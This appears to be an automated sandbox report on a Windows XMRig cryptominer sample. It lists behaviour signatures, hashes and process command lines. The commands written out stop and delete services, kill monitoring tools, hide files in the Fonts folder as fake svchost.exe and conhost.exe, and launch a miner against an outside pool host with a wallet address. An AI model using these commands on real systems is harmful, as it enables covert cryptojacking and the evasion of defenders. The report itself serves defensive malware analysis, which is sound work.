Analysis Overview
SHA256
ec4438d1b316a2d106e5070cc7881f9f9d9bcfaf51614bf1c768cc374bdc4ae2
Threat Level: Known bad
The file 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
xmrig
Disables service(s)
XMRig Miner payload
Stops running service(s)
Deletes itself
Checks computer location settings
Executes dropped EXE
UPX packed file
Loads dropped DLL
Launches sc.exe
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Views/modifies file attributes
Runs net.exe
Kills process with taskkill
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-22 15:02
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 15:02
Reported
2024-05-22 15:05
Platform
win7-20240419-en
Max time kernel
44s
Max time network
6s
Command Line
Signatures
Disables service(s)
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stops running service(s)
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | \??\c:\windows\Fonts\svchost.exe | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| File created | \??\c:\windows\Fonts\conhost.exe | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| File opened for modification | \??\c:\windows\Fonts\conhost.exe | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| File opened for modification | \??\c:\windows\Fonts\svchost.exe | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Runs net.exe
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
C:\Windows\SysWOW64\net.exe
net stop Microsarver
C:\Windows\SysWOW64\sc.exe
sc delete Microsarver
C:\Windows\SysWOW64\net.exe
net stop Samsorver
C:\Windows\SysWOW64\sc.exe
sc delete Samsorver
C:\Windows\SysWOW64\net.exe
net stop lanmanserver /y
C:\Windows\SysWOW64\sc.exe
sc config lanmanserver start= DISABLED 2>nul
C:\Windows\SysWOW64\sc.exe
sc delete lanmanserver
C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.0
C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.0
C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.1
C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.1
C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install Microsarver c:\windows\Fonts\conhost.exe
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set Microsarver DisplayName Network Location Service
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set Microsarver Description Provides performance library information from Windows Management.
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start Microsarver
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Microsarver
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.0
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop lanmanserver /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Samsorver
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"
Network
Files
memory/1968-0-0x0000000000400000-0x00000000009C1000-memory.dmp
\Windows\Fonts\svchost.exe
| MD5 | 0a7d7ed55c4202f5106824f11ecb22fa |
| SHA1 | 730da74e178d7b114e5d4c0f1dcc956accd4942d |
| SHA256 | 5657876e79df5212f255b4bfb0f69df9b09be4ae833e1b170de78a37b7179595 |
| SHA512 | 45a4652d229491c936b0fd5839b335ae924d5b7ee5b05925ebb2f0bb8ca030fca9544ecf4050089b04195e877fcdae4657cd29621299e053398093ee4e5fadb7 |
memory/1968-21-0x0000000000400000-0x00000000009C1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tem.vbs
| MD5 | f88a489a387ebc7c4c0c6b122ff6aa9b |
| SHA1 | 197f045b81fc47892ec4b879f4b55ef1fda8f307 |
| SHA256 | 8d6df3f20ca96ef6e033fe7c442f76784bed8aad65e7272b384175e4b9412a5a |
| SHA512 | 046a13ce212c374adf315b1d3c95bf4044feee01b44eaa91b48cb1885660899473f5934031b1fef8ee2639fa4b322e83ebea1ad42fbb9100fd3f66fd3b59c391 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-22 15:02
Reported
2024-05-22 15:05
Platform
win10v2004-20240508-en
Max time kernel
149s
Max time network
147s
Command Line
Signatures
Disables service(s)
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\conhost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\KvMonXP.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | \??\c:\windows\Fonts\svchost.exe | \??\c:\windows\Fonts\conhost.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | \??\c:\windows\Fonts\KvMonXP.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\conhost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\conhost.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
Processes
C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
C:\Windows\SysWOW64\net.exe
net stop Microsarver
C:\Windows\SysWOW64\sc.exe
sc delete Microsarver
C:\Windows\SysWOW64\net.exe
net stop Samsorver
C:\Windows\SysWOW64\sc.exe
sc delete Samsorver
C:\Windows\SysWOW64\net.exe
net stop lanmanserver /y
C:\Windows\SysWOW64\sc.exe
sc config lanmanserver start= DISABLED 2>nul
C:\Windows\SysWOW64\sc.exe
sc delete lanmanserver
C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.0
C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.0
C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.1
C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.1
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install Microsarver c:\windows\Fonts\conhost.exe
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set Microsarver DisplayName Network Location Service
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set Microsarver Description Provides performance library information from Windows Management.
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start Microsarver
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Microsarver
C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop lanmanserver /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Samsorver
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.0
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.1
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"
\??\c:\windows\Fonts\conhost.exe
"c:\windows\Fonts\conhost.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im taskmgr.exe /f /T
C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im rundll32.exe /f /T
C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im autoruns.exe /f /T
C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im perfmon.exe /f /T
C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im procexp.exe /f /T
C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im ProcessHacker.exe /f /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /im taskmgr.exe /f /T
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
C:\Windows\SysWOW64\taskkill.exe
taskkill /im ProcessHacker.exe /f /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /im rundll32.exe /f /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /im autoruns.exe /f /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /im procexp.exe /f /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /im perfmon.exe /f /T
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install Samsorver KvMonXP -o stratum+tcp://max.csrss.website:5555 -u 49tzxeXRHecDF4bHMDFU4iRpVqHTJiYJiJxv4MgkD2JMCjw3UQSWV3qBbZqDHfsNEbDzU8hLq9UqH4MBoxy36RBvFuVfasv -p x -k --donate-level=1 --max-cpu-usage=50 --print-time=5 --nicehash
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set Samsorver DisplayName WMI Performance Services
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set Samsorver Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start Samsorver
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe
C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
\??\c:\windows\Fonts\KvMonXP.exe
"KvMonXP" -o stratum+tcp://max.csrss.website:5555 -u 49tzxeXRHecDF4bHMDFU4iRpVqHTJiYJiJxv4MgkD2JMCjw3UQSWV3qBbZqDHfsNEbDzU8hLq9UqH4MBoxy36RBvFuVfasv -p x -k --donate-level=1 --max-cpu-usage=50 --print-time=5 --nicehash
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
